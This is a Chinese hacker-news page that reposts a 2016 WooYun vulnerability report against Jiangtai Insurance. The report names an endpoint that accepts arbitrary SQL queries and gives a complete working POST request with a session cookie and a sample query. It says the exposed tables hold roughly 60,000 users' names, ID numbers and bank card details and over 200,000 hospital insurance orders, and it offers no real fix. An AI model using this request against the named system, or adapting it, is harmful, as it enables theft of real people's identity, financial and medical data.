记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

江泰保险大量用户信息涉及(姓名/身份证/银行卡等)20W+医院医保数据

2016-02-24 17:10

检测发现以下链接可直接查询数据库:http://lib.jiangtai.com/common/easyQueryVer3/EasyQueryXML.jsp

在POST中写入查询语句即可~

code 区域
POST http://lib.jiangtai.com/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1

Content-Length: 47

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip,deflate

Connection: keep-alive

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0

Host: lib.jiangtai.com

Referer: http://lib.jiangtai.com/index/indexTest.jsp

Pragma: no-cache

Cache-Control: no-cache

Cookie: JSESSIONID=m9Q8WG2Gt3x2pVhJpbV1GH9RZh5nvyn3p5MRvhCsTBQDMpv63JyV!-1657701527; BIGipServerrenshou=1510215852.31337.0000

Content-Type: application/x-www-form-urlencoded; charset=UTF-8



SELECT user from dual&1&0&0

漏洞证明:

1、大量用户信息泄漏,含姓名/身份证/银行卡等

表:llinpbnf/ljaget,近6W

QQ拼音截图未命名.jpg



QQ拼音截图未命名.jpg



2、大量医院医保订单泄漏,共20W+

表:llfeemain

QQ拼音截图未命名.jpg



3、大量订单信息泄漏

表:lfitemrelaorder,共2W+

QQ拼音截图未命名.jpg

修复方案:

请多指教~

知识来源: www.wooyun.org/bugs/wooyun-2016-0176939

阅读:109126 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“江泰保险大量用户信息涉及(姓名/身份证/银行卡等)20W+医院医保数据”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云